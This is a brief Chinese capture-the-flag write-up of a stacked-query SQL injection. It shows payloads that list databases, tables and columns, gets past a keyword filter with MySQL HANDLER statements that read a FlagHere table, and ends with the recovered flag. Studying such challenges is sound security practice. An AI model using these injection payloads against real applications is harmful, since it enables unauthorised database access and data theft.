首先随便注入一下
1';show databases;# //获取数据库名
1';show tables;# //获取表名
1’;desc `表名` //获取表结构
当我们再次使用修改字段名这种方式的时候,发现过滤了这些关键字,该怎么办呢
于是,我们查了百度,然后又学会了一个新姿势
HANDLER [表名] OPEN;语句打开一个表,使其可以使用后续HANDLER [表名] READ;该表对象未被其他会话共享,并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭
1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere close;#
执行这个,然后,就可以出来flag了
flag{7d92cf4a-b167-4a48-babe-1fc5ad19e472}